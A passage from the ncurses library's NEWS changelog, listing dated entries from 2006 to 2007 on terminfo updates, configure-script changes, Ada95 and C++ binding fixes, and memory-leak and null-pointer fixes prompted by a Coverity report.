20070714 2672 + add test/savescreen.c test-program 2673 + add check to trace-file open, if the given name is a directory, add 2674 ".log" to the name and try again. 2675 + add konsole-256color entry -TD 2676 + add extra gcc warning options from xterm. 2677 + minor fixes for ncurses/hashmap test-program. 2678 + modify configure script to quiet c++ build with libtool when the 2679 --disable-echo option is used. 2680 + modify configure script to disable ada95 if libtool is selected, 2681 writing a warning message (addresses FreeBSD ports/114493). 2682 + update config.guess, config.sub 2683 2684 20070707 2685 + add continuous-move "M" to demo_panels to help test refresh changes. 2686 + improve fix for refresh of window on top of multi-column characters, 2687 taking into account some split characters on left/right window 2688 boundaries. 2689 2690 20070630 2691 + add "widec" row to _tracedump() output to help diagnose remaining 2692 problems with multi-column characters. 2693 + partial fix for refresh of window on top of multi-column characters 2694 which are partly overwritten (report by Sadrul H Chowdhury). 2695 + ignore A_CHARTEXT bits in vidattr() and vid_attr(), in case 2696 multi-column extension bits are passed there. 2697 + add setlocale() call to demo_panels.c, needed for wide-characters. 2698 + add some output flags to _nc_trace_ttymode to help diagnose a bug 2699 report by Larry Virden, i.e., ONLCR, OCRNL, ONOCR and ONLRET, 2700 2701 20070623 2702 + add test/demo_panels.c 2703 + implement opaque version of setsyx() and getsyx(). 2704 2705 20070612 2706 + corrected xterm+pcf2 terminfo modifiers for F1-F4, to match xterm 2707 #226 -TD 2708 + split-out key_name() from MKkeyname.awk since it now depends upon 2709 wunctrl() which is not in libtinfo (report by Rong-En Fan). 2710 2711 20070609 2712 + add test/key_name.c 2713 + add stdscr cases to test/inchs.c and test/inch_wide.c 2714 + update test/configure 2715 + correct formatting of DEL (0x7f) in _nc_vischar(). 2716 + null-terminate result of wunctrl(). 2717 + add null-pointer check in key_name() (report by Andreas Krennmair, 2718 cf: 20020901). 2719 2720 20070602 2721 + adapt mouse-handling code from menu library in form-library 2722 (discussion with Clive Nicolson). 2723 + add a modification of test/dots.c, i.e., test/dots_mvcur.c to 2724 illustrate how to use mvcur(). 2725 + modify wide-character flavor of SetAttr() to preserve the 2726 WidecExt() value stored in the .attr field, e.g., in case it 2727 is overwritten by chgat (report by Aleksi Torhamo). 2728 + correct buffer-size for _nc_viswbuf2n() (report by Aleksi Torhamo). 2729 + build-fixes for Solaris 2.6 and 2.7 (patch by Peter O'Gorman). 2730 2731 20070526 2732 + modify keyname() to use "^X" form only if meta() has been called, or 2733 if keyname() is called without initializing curses, e.g., via 2734 initscr() or newterm() (prompted by LinuxBase #1604). 2735 + document some portability issues in man/curs_util.3x 2736 + add a shadow copy of TTY buffer to _nc_prescreen to fix applications 2737 broken by moving that data into SCREEN (cf: 20061230). 2738 2739 20070512 2740 + add 'O' (wide-character panel test) in ncurses.c to demonstrate a 2741 problem reported by Sadrul H Chowdhury with repainting parts of 2742 a fullwidth cell. 2743 + modify slk_init() so that if there are preceding calls to 2744 ripoffline(), those affect the available lines for soft-keys (adapted 2745 from patch by Clive Nicolson). 2746 + document some portability issues in man/curs_getyx.3x 2747 2748 20070505 2749 + fix a bug in Ada95/samples/ncurses which caused a variable to 2750 become uninitialized in the "b" test. 2751 + fix Ada95/gen/Makefile.in adahtml rule to account for recent 2752 movement of files, fix a few incorrect manpage references in the 2753 generated html. 2754 + add Ada95 binding to _nc_freeall() as Curses_Free_All to help with 2755 memory-checking. 2756 + correct some functions in Ada95 binding which were using return value 2757 from C where none was returned: idcok(), immedok() and wtimeout(). 2758 + amend recent changes for Ada95 binding to make it build with 2759 Cygwin's linker, e.g., with configure options 2760 --enable-broken-linker --with-ticlib 2761 2762 20070428 2763 + add a configure check for gcc's options for inlining, use that to 2764 quiet a warning message where gcc's default behavior changed from 2765 3.x to 4.x. 2766 + improve warning message when checking if GPM is linked to curses 2767 library by not warning if its use of "wgetch" is via a weak symbol. 2768 + add loader options when building with static libraries to ensure that 2769 an installed shared library for ncurses does not conflict. This is 2770 reported as problem with Tru64, but could affect other platforms 2771 (report Martin Mokrejs, analysis by Tim Mooney). 2772 + fix build on cygwin after recent ticlib/termlib changes, i.e., 2773 + adjust TINFO_SUFFIX value to work with cygwin's dll naming 2774 + revert a change from 20070303 which commented out dependency of 2775 SHLIB_LIST in form/menu/panel/c++ libraries. 2776 + fix initialization of ripoff stack pointer (cf: 20070421). 2777 2778 20070421 2779 + move most static variables into structures _nc_globals and 2780 _nc_prescreen, to simplify storage. 2781 + add/use configure script macro CF_SIG_ATOMIC_T, use the corresponding 2782 type for data manipulated by signal handlers (prompted by comments 2783 in mailing.openbsd.bugs newsgroup). 2784 + modify CF_WITH_LIBTOOL to allow one to pass options such as -static 2785 to the libtool create- and link-operations. 2786 2787 20070414 2788 + fix whitespace in curs_opaque.3x which caused a spurious ';' in 2789 the installed aliases (report by Peter Santoro). 2790 + fix configure script to not try to generate adacurses-config when 2791 Ada95 tree is not built. 2792 2793 20070407 2794 + add man/curs_legacy.3x, man/curs_opaque.3x 2795 + fix acs_map binding for Ada95 when --enable-reentrant is used. 2796 + add adacurses-config to the Ada95 install, based on version from 2797 FreeBSD port, in turn by Juergen Pfeifer in 2000 (prompted by 2798 comment on comp.lang.ada newsgroup). 2799 + fix includes in c++ binding to build with Intel compiler 2800 (cf: 20061209). 2801 + update install rule in Ada95 to use mkdirs.sh 2802 > other fixes prompted by inspection for Coverity report: 2803 + modify ifdef's for c++ binding to use try/catch/throw statements 2804 + add a null-pointer check in tack/ansi.c request_cfss() 2805 + fix a memory leak in ncurses/base/wresize.c 2806 + corrected check for valid memu/meml capabilities in 2807 progs/dump_entry.c when handling V_HPUX case. 2808 > fixes based on Coverity report: 2809 + remove dead code in test/bs.c 2810 + remove dead code in test/demo_defkey.c 2811 + remove an unused assignment in progs/infocmp.c 2812 + fix a limit check in tack/ansi.c tools_charset() 2813 + fix tack/ansi.c tools_status() to perform the VT320/VT420 2814 tests in request_cfss(). The function had exited too soon. 2815 + fix a memory leak in tic.c's make_namelist() 2816 + fix a couple of places in tack/output.c which did not check for EOF. 2817 + fix a loop-condition in test/bs.c 2818 + add index checks in lib_color.c for color palettes 2819 + add index checks in progs/dump_entry.c for version_filter() handling 2820 of V_BSD case. 2821 + fix a possible null-pointer dereference in copywin() 2822 + fix a possible null-pointer dereference in waddchnstr() 2823 + add a null-pointer check in _nc_expand_try() 2824 + add a null-pointer check in tic.c's make_namelist() 2825 + add a null-pointer check in _nc_expand_try() 2826 + add null-pointer checks in test/cardfile.c 2827 + fix a double-free in ncurses/tinfo/trim_sgr0.c 2828 + fix a double-free in ncurses/base/wresize.c 2829 + add try/catch block to c++/cursesmain.cc 2830 2831 20070331 2832 + modify Ada95 binding to build with --enable-reentrant by wrapping 2833 global variables (bug: acs_map does not yet work). 2834 + modify Ada95 binding to use the new access-functions, allowing it 2835 to build/run when NCURSES_OPAQUE is set. 2836 + add access-functions and macros to return properties of the WINDOW 2837 structure, e.g., when NCURSES_OPAQUE is set. 2838 + improved install-sh's quoting. 2839 + use mkdirs.sh rather than mkinstalldirs, e.g., to use fixes from 2840 other programs. 2841 2842 20070324 2843 + eliminate part of the direct use of WINDOW data from Ada95 interface. 2844 + fix substitutions for termlib filename to make configure option 2845 --enable-reentrant work with --with-termlib. 2846 + change a constructor for NCursesWindow to allow compiling with 2847 NCURSES_OPAQUE set, since we cannot pass a reference to 2848 an opaque pointer. 2849 2850 20070317 2851 + ignore --with-chtype=unsigned since unsigned is always added to 2852 the type in curses.h; do the same for --with-mmask-t. 2853 + change warning regarding --enable-ext-colors and wide-character 2854 in the configure script to an error. 2855 + tweak error message in CF_WITH_LIBTOOL to distinguish other programs 2856 such as Darwin's libtool program (report by Michail Vidiassov) 2857 + modify edit_man.sh to allow for multiple substitutions per line. 2858 + set locale in misc/ncurses-config.in since it uses a range 2859 + change permissions libncurses++.a install (report by Michail 2860 Vidiassov). 2861 + corrected length of temporary buffer in wide-character version 2862 of set_field_buffer() (related to report by Bryan Christ). 2863 2864 20070311 2865 + fix mk-1st.awk script install_shlib() function, broken in 20070224 2866 changes for cygwin (report by Michail Vidiassov). 2867 2868 20070310 2869 + increase size of array in _nc_visbuf2n() to make "tic -v" work 2870 properly in its similar_sgr() function (report/analysis by Peter 2871 Santoro). 2872 + add --enable-reentrant configure option for ongoing changes to 2873 implement a reentrant version of ncurses: 2874 + libraries are suffixed with "t" 2875 + wrap several global variables (curscr, newscr, stdscr, ttytype, 2876 COLORS, COLOR_PAIRS, COLS, ESCDELAY, LINES and TABSIZE) as 2877 functions returning values stored in SCREEN or cur_term. 2878 + move some initialization (LINES, COLS) from lib_setup.c, 2879 i.e., setupterm() to _nc_setupscreen(), i.e., newterm(). 2880 2881 20070303 2882 + regenerated html documentation. 2883 + add NCURSES_OPAQUE symbol to curses.h, will use to make structs 2884 opaque in selected configurations. 2885 + move the chunk in lib_acs.c which resets acs capabilities when 2886 running on a terminal whose locale interferes with those into 2887 _nc_setupscreen(), so the libtinfo/libtinfow files can be made 2888 identical (requested by Miroslav Lichvar). 2889 + do not use configure variable SHLIB_LIBS for building libraries 2890 outside the ncurses directory, since that symbol is customized 2891 only for that directory, and using it introduces an unneeded 2892 dependency on libdl (requested by Miroslav Lichvar). 2893 + modify mk-1st.awk so the generated makefile rules for linking or 2894 installing shared libraries do not first remove the library, in 2895 case it is in use, e.g., libncurses.so by /bin/sh (report by Jeff 2896 Chua). 2897 + revised section "Using NCURSES under XTERM" in ncurses-intro.html 2898 (prompted by newsgroup comment by Nick Guenther). 2899 2900 20070224 2901 + change internal return codes of _nc_wgetch() to check for cases 2902 where KEY_CODE_YES should be returned, e.g., if a KEY_RESIZE was 2903 ungetch'd, and read by wget_wch(). 2904 + fix static-library build broken in 20070217 changes to remove "-ldl" 2905 (report by Miroslav Lichvar). 2906 + change makefile/scripts for cygwin to allow building termlib. 2907 + use Form_Hook in manpages to match form.h 2908 + use Menu_Hook in manpages, as well as a few places in menu.h 2909 + correct form- and menu-manpages to use specific Field_Options, 2910 Menu_Options and Item_Options types. 2911 + correct prototype for _tracechar() in manpage (cf: 20011229). 2912 + correct prototype for wunctrl() in manpage. 2913 2914 20070217 2915 + fixes for $(TICS_LIST) in ncurses/Makefile (report by Miroslav 2916 Lichvar). 2917 + modify relinking of shared libraries to apply only when rpath is 2918 enabled, and add --disable-relink option which can be used to 2919 disable the feature altogether (reports by Michail Vidiassov, 2920 Adam J Richter). 2921 + fix --with-termlib option for wide-character configuration, stripping 2922 the "w" suffix in one place (report by Miroslav Lichvar). 2923 + remove "-ldl" from some library lists to reduce dependencies in 2924 programs (report by Miroslav Lichvar). 2925 + correct description of --enable-signed-char in configure --help 2926 (report by Michail Vidiassov). 2927 + add pattern for GNU/kFreeBSD configuration to CF_XOPEN_SOURCE, 2928 which matches an earlier change to CF_SHARED_OPTS, from xterm #224 2929 fixes. 2930 + remove "${DESTDIR}" from -install_name option used for linking 2931 shared libraries on Darwin (report by Michail Vidiassov). 2932 2933 20070210 2934 + add test/inchs.c, test/inch_wide.c, to test win_wchnstr(). 2935 + remove libdl from library list for termlib (report by Miroslav 2936 Lichvar). 2937 + fix configure.in to allow --without-progs --with-termlib (patch by 2938 Miroslav Lichvar). 2939 + modify win_wchnstr() to ensure that only a base cell is returned 2940 for each multi-column character (prompted by report by Wei Kong 2941 regarding change in mvwin_wch() cf: 20041023). 2942 2943 20070203 2944 + modify fix_wchnstr() in form library to strip attributes (and color) 2945 from the cchar_t array (field cells) read from a field's window. 2946 Otherwise, when copying the field cells back to the window, the 2947 associated color overrides the field's background color (report by 2948 Ricardo Cantu). 2949 + improve tracing for form library, showing created forms, fields, etc. 2950 + ignore --enable-rpath configure option if --with-shared was omitted. 2951 + add _nc_leaks_tinfo(), _nc_free_tic(), _nc_free_tinfo() entrypoints 2952 to allow leak-checking when both tic- and tinfo-libraries are built. 2953 + drop CF_CPP_VSCAN_FUNC macro from configure script, since C++ binding 2954 no longer relies on it. 2955 + disallow combining configure script options --with-ticlib and 2956 --enable-termcap (report by Rong-En Fan). 2957 + remove tack from ncurses tree. 2958 2959 20070128 2960 + fix typo in configure script that broke --with-termlib option 2961 (report by Rong-En Fan). 2962 2963 20070127 2964 + improve fix for FreeBSD gnu/98975, to allow for null pointer passed 2965 to tgetent() (report by Rong-en Fan). 2966 + update tack/HISTORY and tack/README to tell how to build it after 2967 it is removed from the ncurses tree. 2968 + fix configure check for libtool's version to trim blank lines 2969 (report by sci-fi@hush.ai). 2970 + review/eliminate other original-file artifacts in cursesw.cc, making 2971 its license consistent with ncurses. 2972 + use ncurses vw_scanw() rather than reading into a fixed buffer in 2973 the c++ binding for scanw() methods (prompted by report by Nuno Dias). 2974 + eliminate fixed-buffer vsprintf() calls in c++ binding. 2975 2976 20070120 2977 + add _nc_leaks_tic() to separate leak-checking of tic library from 2978 term/ncurses libraries, and thereby eliminate a library dependency. 2979 + fix test/mk-test.awk to ignore blank lines. 2980 + correct paths in include/headers, for --srcdir (patch by Miroslav 2981 Lichvar). 2982 2983 20070113 2984 + add a break-statement in misc/shlib to ensure that it exits on the 2985 _first_ matched directory (report by Paul Novak). 2986 + add tack/configure, which can be used to build tack outside the 2987 ncurses build-tree. 2988 + add --with-ticlib option, to build/install the tic-support functions 2989 in a separate library (suggested by Miroslav Lichvar). 2990 2991 20070106 2992 + change MKunctrl.awk to reduce relocation table for unctrl.o 2993 + change MKkeyname.awk to reduce relocation table for keyname.o 2994 (patch by Miroslav Lichvar). 2995 2996 20061230 2997 + modify configure check for libtool's version to trim blank lines 2998 (report by sci-fi@hush.ai). 2999 + modify some modules to allow them to be reentrant if _REENTRANT is 3000 defined: lib_baudrate.c, resizeterm.c (local data only) 3001 + eliminate static data from some modules: add_tries.c, hardscroll.c, 3002 lib_ttyflags.c, lib_twait.c 3003 + improve manpage install to add aliases for the transformed program 3004 names, e.g., from --program-prefix. 3005 + used linklint to verify links in the HTML documentation, made fixes 3006 to manpages as needed. 3007 + fix a typo in curs_mouse.3x (report by William McBrine). 3008 + fix install-rule for ncurses5-config to make the bin-directory. 3009 3010 20061223 3011 + modify configure script to omit the tic (terminfo compiler) support 3012 from ncurses library if --without-progs option is given. 3013 + modify install rule for ncurses5-config to do this via "install.libs" 3014 + modify shared-library rules to allow FreeBSD 3.x to use rpath. 3015 + update config.guess, config.sub 3016 3017 20061217 5.6 release for upload to 3018 3019 20061217 3020 + add ifdef's for <wctype.h> for HPUX, which has the corresponding 3021 definitions in <wchar.h>. 3022 + revert the va_copy() change from 20061202, since it was neither 3023 correct nor portable. 3024 + add $(LOCAL_LIBS) definition to progs/Makefile.in, needed for 3025 rpath on Solaris. 3026 + ignore wide-acs line-drawing characters that wcwidth() claims are 3027 not one-column. This is a workaround for Solaris' broken locale 3028 support. 3029 3030 20061216 3031 + modify configure --with-gpm option to allow it to accept a parameter, 3032 i.e., the name of the dynamic GPM library to load via dlopen() 3033 (requested by Bryan Henderson). 3034 + add configure option --with-valgrind, changes from vile. 3035 + modify configure script AC_TRY_RUN and AC_TRY_LINK checks to use 3036 'return' in preference to 'exit()'. 3037 3038 20061209 3039 + change default for --with-develop back to "no". 3040 + add XTABS to tracing of TTY bits. 3041 + updated autoconf patch to ifdef-out the misfeature which declares 3042 exit() for configure tests. This fixes a redefinition warning on 3043 Solaris. 3044 + use ${CC} rather than ${LD} in shared library rules for IRIX64, 3045 Solaris to help ensure that initialization sections are provided for 3046 extra linkage requirements, e.g., of C++ applications (prompted by 3047 comment by Casper Dik in newsgroup). 3048 + rename "$target" in CF_MAN_PAGES to make it easier to distinguish 3049 from the autoconf predefined symbol. There was no conflict, 3050 since "$target" was used only in the generated edit_man.sh file, 3051 but SuSE's rpm package contains a patch. 3052 3053 20061202 3054 + update man/term.5 to reflect extended terminfo support and hashed 3055 database configuration. 3056 + updates for test/configure script. 3057 + adapted from SuSE rpm package: 3058 + remove long-obsolete workaround for broken-linker which declared 3059 cur_term in tic.c 3060 + improve error recovery in PUTC() macro when wcrtomb() does not 3061 return usable results for an 8-bit character. 3062 + patches from rpm package (SuSE): 3063 + use va_copy() in extra varargs manipulation for tracing version 3064 of printw, etc. 3065 + use a va_list rather than a null in _nc_freeall()'s call to 3066 _nc_printf_string(). 3067 + add some see-also references in manpages to show related 3068 wide-character functions (suggested by Claus Fischer). 3069 3070 20061125 3071 + add a check in lib_color.c to ensure caller does not increase COLORS 3072 above max_colors, which is used as an array index (discussion with 3073 Simon Sasburg). 3074 + add ifdef's allowing ncurses to be built with tparm() using either 3075 varargs (the existing status), or using a fixed-parameter list (to 3076 match X/Open). 3077 3078 20061104 3079 + fix redrawing of windows other than stdscr using wredrawln() by 3080 touching the corresponding rows in curscr (discussion with Dan 3081 Gookin). 3082 + add test/redraw.c 3083 + add test/echochar.c 3084 + review/cleanup manpage descriptions of error-returns for form- and 3085 menu-libraries (prompted by FreeBSD docs/46196). 3086 3087 20061028 3088 + add AUTHORS file -TD 3089 + omit the -D options from output of the new config script --cflags 3090 option (suggested by Ralf S Engelschall). 3091 + make NCURSES_INLINE unconditionally defined in curses.h 3092 3093 20061021 3094 + revert change to accommodate bash 3.2, since that breaks other 3095 platforms, e.g., Solaris. 3096 + minor fixes to NEWS file to simplify scripting to obtain list of 3097 contributors. 3098 + improve some shared-library configure scripting for Linux, FreeBSD 3099 and NetBSD to make "--with-shlib-version" work. 3100 + change configure-script rules for FreeBSD shared libraries to allow 3101 for rpath support in versions past 3. 3102 + use $(DESTDIR) in makefile rules for installing/uninstalling the 3103 package config script (reports/patches by Christian Wiese, 3104 Ralf S Engelschall). 3105 + fix a warning in the configure script for NetBSD 2.0, working around 3106 spurious blanks embedded in its ${MAKEFLAGS} symbol. 3107 + change test/Makefile to simplify installing test programs in a 3108 different directory when --enable-rpath is used. 3109 3110 20061014 3111 + work around bug in bash 3.2 by adding extra quotes (Jim Gifford). 3112 + add/install a package config script, e.g., "ncurses5-config" or 3113 "ncursesw5-config", according to configuration options. 3114 3115 20061007 3116 + add several GNU Screen terminfo variations with 16- and 256-colors, 3117 and status line (Alain Bench). 3118 + change the way shared libraries (other than libtool) are installed. 3119 Rather than copying the build-tree's libraries, link the shared 3120 objects into the install directory. This makes the --with-rpath 3121 option work except with $(DESTDIR) (cf: 20000930). 3122 3123 20060930 3124 + fix ifdef in c++/internal.h for QNX 6.1 3125 + test-compiled with (old) egcs-1.1.2, modified configure script to 3126 not unset the $CXX and related variables which would prevent this. 3127 + fix a few terminfo.src typos exposed by improvments to "-f" option. 3128 + improve infocmp/tic "-f" option formatting. 3129 3130 20060923 3131 + make --disable-largefile option work (report by Thomas M Ott). 3132 + updated html documentation. 3133 + add ka2, kb1, kb3, kc2 to vt220-keypad as an extension -TD 3134 + minor improvements to rxvt+pcfkeys -TD 3135 3136 20060916 3137 + move static data from lib_mouse.c into SCREEN struct. 3138 + improve ifdef's for _POSIX_VDISABLE in tset to work with Mac OS X 3139 (report by Michail Vidiassov). 3140 + modify CF_PATH_SYNTAX to ensure it uses the result from --prefix 3141 option (from lynx changes) -TD 3142 + adapt AC_PROG_EGREP check, noting that this is likely to be another 3143 place aggravated by POSIXLY_CORRECT. 3144 + modify configure check for awk to ensure that it is found (prompted 3145 by report by Christopher Parker). 3146 + update config.sub 3147 3148 20060909 3149 + add kon, kon2 and jfbterm terminfo entry (request by Till Maas) -TD 3150 + remove invis capability from klone+sgr, mainly used by linux entry, 3151 since it does not really do this -TD 3152 3153 20060903 3154 + correct logic in wadd_wch() and wecho_wch(), which did not guard 3155 against passing the multi-column attribute into a call on waddch(), 3156 e.g., using data returned by win_wch() (cf: 20041023) 3157 (report by Sadrul H Chowdhury). 3158 3159 20060902 3160 + fix kterm's acsc string -TD 3161 + fix for change to tic/infocmp in 20060819 to ensure no blank is 3162 embedded into a termcap description. 3163 + workaround for 20050806 ifdef's change to allow visbuf.c to compile 3164 when using --with-termlib --with-trace options. 3165 + improve tgetstr() by making the return value point into the user's 3166 buffer, if provided (patch by Miroslav Lichvar (see Redhat #202480)). 3167 + correct libraries needed for foldkeys (report by Stanislav Ievlev) 3168 3169 20060826 3170 + add terminfo entries for xfce terminal (xfce) and multi gnome 3171 terminal (mgt) -TD 3172 + add test/foldkeys.c 3173 3174 20060819 3175 + modify tic and infocmp to avoid writing trailing blanks on terminfo 3176 source output (Debian #378783). 3177 + modify configure script to ensure that if the C compiler is used 3178 rather than the loader in making shared libraries, the $(CFLAGS) 3179 variable is also used (Redhat #199369). 3180 + port hashed-db code to db2 and db3. 3181 + fix a bug in tgetent() from 20060625 and 20060715 changes 3182 (patch/analysis by Miroslav Lichvar (see Redhat #202480)). 3183 3184 20060805 3185 + updated xterm function-keys terminfo to match xterm #216 -TD 3186 + add configure --with-hashed-db option (tested only with FreeBSD 6.0, 3187 e.g., the db 1.8.5 interface). 3188 3189 20060729 3190 + modify toe to access termcap data, e.g., via cgetent() functions, 3191 or as a text file if those are not available. 3192 + use _nc_basename() in tset to improve $SHELL check for csh/sh. 3193 + modify _nc_read_entry() and _nc_read_termcap_entry() so infocmp, 3194 can access termcap data when the terminfo database is disabled. 3195 3196 20060722 3197 + widen the test for xterm kmous a little to allow for other strings 3198 than \E[M, e.g., for xterm-sco functionality in xterm. 3199 + update xterm-related terminfo entries to match xterm patch #216 -TD 3200 + update config.guess, config.sub 3201 3202 20060715 3203 + fix for install-rule in Ada95 to add terminal_interface.ads 3204 and terminal_interface.ali (anonymous posting in comp.lang.ada). 3205 + correction to manpage for getcchar() (report by William McBrine). 3206 + add test/chgat.c 3207 + modify wchgat() to mark updated cells as changed so a refresh will 3208 repaint those cells (comments by Sadrul H Chowdhury and William 3209 McBrine). 3210 + split up dependency of names.c and codes.c in ncurses/Makefile to 3211 work with parallel make (report/analysis by Joseph S Myers). 3212 + suppress a warning message (which is ignored) for systems without 3213 an ldconfig program (patch by Justin Hibbits). 3214 + modify configure script --disable-symlinks option to allow one to 3215 disable symlink() in tic even when link() does not work (report by 3216 Nigel Horne). 3217 + modify MKfallback.sh to use tic -x when constructing fallback tables 3218 to allow extended capabilities to be retrieved from a fallback entry. 3219 + improve leak-checking logic in tgetent() from 20060625 to ensure that 3220 it does not free the current screen (report by Miroslav Lichvar). 3221 3222 20060708 3223 + add a check for _POSIX_VDISABLE in tset (NetBSD #33916). 3224 + correct _nc_free_entries() and related functions used for memory leak 3225 checking of tic. 3226 3227 20060701 3228 + revert a minor change for magic-cookie support from 20060513, which 3229 caused unexpected reset of attributes, e.g., when resizing test/view 3230 in color mode. 3231 + note in clear manpage that the program ignores command-line 3232 parameters (prompted by Debian #371855). 3233 + fixes to make lib_gen.c build properly with changes to the configure 3234 --disable-macros option and NCURSES_NOMACROS (cf: 20060527) 3235 + update/correct several terminfo entries -TD 3236 + add some notes regarding copyright to terminfo.src -TD 3237 3238 20060625 3239 + fixes to build Ada95 binding with gnat-4.1.0 3240 + modify read_termtype() so the term_names data is always allocated as 3241 part of the str_table, a better fix for a memory leak (cf: 20030809). 3242 + reduce memory leaks in repeated calls to tgetent() by remembering the 3243 last TERMINAL* value allocated to hold the corresponding data and 3244 freeing that if the tgetent() result buffer is the same as the 3245 previous call (report by "Matt" for FreeBSD gnu/98975). 3246 + modify tack to test extended capability function-key strings. 3247 + improved gnome terminfo entry (GenToo #122566). 3248 + improved xterm-256color terminfo entry (patch by Alain Bench). 3249 3250 20060617 3251 + fix two small memory leaks related to repeated tgetent() calls 3252 with TERM=screen (report by "Matt" for FreeBSD gnu/98975). 3253 + add --enable-signed-char to simplify Debian package. 3254 + reduce name-pollution in term.h by removing #define's for HAVE_xxx 3255 symbols. 3256 + correct typo in curs_terminfo.3x (Debian #369168). 3257 3258 20060603 3259 + enable the mouse in test/movewindow.c 3260 + improve a limit-check in frm_def.c (John Heasley). 3261 + minor copyright fixes. 3262 + change configure script to produce test/Makefile from data file. 3263 3264 20060527 3265 + add a configure option --enable-wgetch-events to enable 3266 NCURSES_WGETCH_EVENTS, and correct the associated loop-logic in 3267 lib_twait.c (report by Bernd Jendrissek). 3268 + remove include/nomacros.h from build, since the ifdef for 3269 NCURSES_NOMACROS makes that obsolete. 3270 + add entrypoints for some functions which were only provided as macros 3271 to make NCURSES_NOMACROS ifdef work properly: getcurx(), getcury(), 3272 getbegx(), getbegy(), getmaxx(), getmaxy(), getparx() and getpary(), 3273 wgetbkgrnd(). 3274 + provide ifdef for NCURSES_NOMACROS which suppresses most macro 3275 definitions from curses.h, i.e., where a macro is defined to override 3276 a function to improve performance. Allowing a developer to suppress 3277 these definitions can simplify some application (discussion with 3278 Stanislav Ievlev). 3279 + improve description of memu/meml in terminfo manpage. 3280 3281 20060520 3282 + if msgr is false, reset video attributes when doing an automargin 3283 wrap to the next line. This makes the ncurses 'k' test work properly 3284 for hpterm. 3285 + correct caching of keyname(), which was using only half of its table. 3286 + minor fixes to memory-leak checking. 3287 + make SCREEN._acs_map and SCREEN._screen_acs_map pointers rather than 3288 arrays, making ACS_LEN less visible to applications (suggested by 3289 Stanislav Ievlev). 3290 + move chunk in SCREEN ifdef'd for USE_WIDEC_SUPPORT to the end, so 3291 _screen_acs_map will have the same offset in both ncurses/ncursesw, 3292 making the corresponding tinfo/tinfow libraries binary-compatible 3293 (cf: 20041016, report by Stanislav Ievlev). 3294 3295 20060513 3296 + improve debug-tracing for EmitRange(). 3297 + change default for --with-develop to "yes". Add NCURSES_NO_HARD_TABS 3298 and NCURSES_NO_MAGIC_COOKIE environment variables to allow runtime 3299 suppression of the related hard-tabs and xmc-glitch features. 3300 + add ncurses version number to top-level manpages, e.g., ncurses, tic, 3301 infocmp, terminfo as well as form, menu, panel. 3302 + update config.guess, config.sub 3303 + modify ncurses.c to work around a bug in NetBSD 3.0 curses 3304 (field_buffer returning null for a valid field). The 'r' test 3305 appears to not work with that configuration since the new_fieldtype() 3306 function is broken in that implementation. 3307 3308 20060506 3309 + add hpterm-color terminfo entry -TD 3310 + fixes to compile test-programs with HPUX 11.23 3311 3312 20060422 3313 + add copyright notices to files other than those that are generated, 3314 data or adapted from pdcurses (reports by William McBrine, David 3315 Taylor). 3316 + improve rendering on hpterm by not resetting attributes at the end 3317 of doupdate() if the terminal has the magic-cookie feature (report 3318 by Bernd Rieke). 3319 + add 256color variants of terminfo entries for programs which are 3320 reported to implement this feature -TD 3321 3322 20060416 3323 + fix typo in change to NewChar() macro from 20060311 changes, which 3324 broke tab-expansion (report by Frederic L W Meunier). 3325 3326 20060415 3327 + document -U option of tic and infocmp. 3328 + modify tic/infocmp to suppress smacs/rmacs when acsc is suppressed 3329 due to size limit, e.g., converting to termcap format. Also 3330 suppress them if the output format does not contain acsc and it 3331 was not VT100-like, i.e., a one-one mapping (Novell #163715). 3332 + add configure check to ensure that SIGWINCH is defined on platforms 3333 such as OS X which exclude that when _XOPEN_SOURCE, etc., are 3334 defined (report by Nicholas Cole) 3335 3336 20060408 3337 + modify write_object() to not write coincidental extensions of an 3338 entry made due to it being referenced in a use= clause (report by 3339 Alain Bench). 3340 + another fix for infocmp -i option, which did not ensure that some 3341 escape sequences had comparable prefixes (report by Alain Bench). 3342 3343 20060401 3344 + improve discussion of init/reset in terminfo and tput manpages 3345 (report by Alain Bench). 3346 + use is3 string for a fallback of rs3 in the reset program; it was 3347 using is2 (report by Alain Bench). 3348 + correct logic for infocmp -i option, which did not account for 3349 multiple digits in a parameter (cf: 20040828) (report by Alain 3350 Bench). 3351 + move _nc_handle_sigwinch() to lib_setup.c to make --with-termlib 3352 option work after 20060114 changes (report by Arkadiusz Miskiewicz). 3353 + add copyright notices to test-programs as needed (report by William 3354 McBrine). 3355 3356 20060318 3357 + modify ncurses.c 'F' test to combine the wide-characters with color 3358 and/or video attributes. 3359 + modify test/ncurses to use CTL/Q or ESC consistently for exiting 3360 a test-screen (some commands used 'x' or 'q'). 3361 3362 20060312 3363 + fix an off-by-one in the scrolling-region change (cf_ 20060311). 3364 3365 20060311 3366 + add checks in waddchnstr() and wadd_wchnstr() to stop copying when 3367 a null character is found (report by Igor Bogomazov). 3368 + modify progs/Makefile.in to make "tput init" work properly with 3369 cygwin, i.e., do not pass a ".exe" in the reference string used 3370 in check_aliases (report by Samuel Thibault). 3371 + add some checks to ensure current position is within scrolling 3372 region before scrolling on a new line (report by Dan Gookin). 3373 + change some NewChar() usage to static variables to work around 3374 stack garbage introduced when cchar_t is not packed (Redhat #182024). 3375 3376 20060225 3377 + workarounds to build test/movewindow with PDcurses 2.7. 3378 + fix for nsterm-16color entry (patch by Alain Bench). 3379 + correct a typo in infocmp manpage (Debian #354281). 3380 3381 20060218 3382 + add nsterm-16color entry -TD 3383 + updated mlterm terminfo entry -TD 3384 + remove 970913 feature for copying subwindows as they are moved in 3385 mvwin() (discussion with Bryan Christ). 3386 + modify test/demo_menus.c to demonstrate moving a menu (both the 3387 window and subwindow) using shifted cursor-keys. 3388 + start implementing recursive mvwin() in movewindow.c (incomplete). 3389 + add a fallback definition for GCC_PRINTFLIKE() in test.priv.h, 3390 for movewindow.c (report by William McBrine). 3391 + add help-message to test/movewindow.c 3392 3393 20060211 3394 + add test/movewindow.c, to test mvderwin(). 3395 + fix ncurses soft-key test so color changes are shown immediately 3396 rather than delayed. 3397 + modify ncurses soft-key test to hide the keys when exiting the test 3398 screen. 3399 + fixes to build test programs with PDCurses 2.7, e.g., its headers 3400 rely on autoconf symbols, and it declares stubs for nonfunctional 3401 terminfo and termcap entrypoints. 3402 3403 20060204 3404 + improved test/configure to build test/ncurses on HPUX 11 using the 3405 vendor curses. 3406 + documented ALTERNATE CONFIGURATIONS in the ncurses manpage, for the 3407 benefit of developers who do not read INSTALL. 3408 3409 20060128 3410 + correct form library Window_To_Buffer() change (cf: 20040516), which 3411 should ignore the video attributes (report by Ricardo Cantu). 3412 3413 20060121 3414 + minor fixes to xmc-glitch experimental code: 3415 + suppress line-drawing 3416 + implement max_attributes 